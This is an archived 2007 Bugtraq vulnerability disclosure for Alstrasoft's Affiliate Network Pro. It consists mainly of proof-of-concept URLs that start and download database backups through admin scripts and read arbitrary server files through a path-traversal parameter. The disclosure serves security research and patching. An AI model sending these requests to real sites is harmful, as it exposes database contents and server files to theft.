lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [month] [year] [list]
Date: 29 Sep 2007 16:23:23 -0000
From: hack2prison@...oo.com
To: bugtraq@...urityfocus.com
Subject: Affiliate Network Pro Multiple Input Validation and Local file
 inclusion

Discovered by hack2prison and navaro - VNBRAIN.NET member
Vendor: Alstrasoft
http://site/path/admin/backupstart.php
http://site/path/admin/admin/dump/backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=../path/filename

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux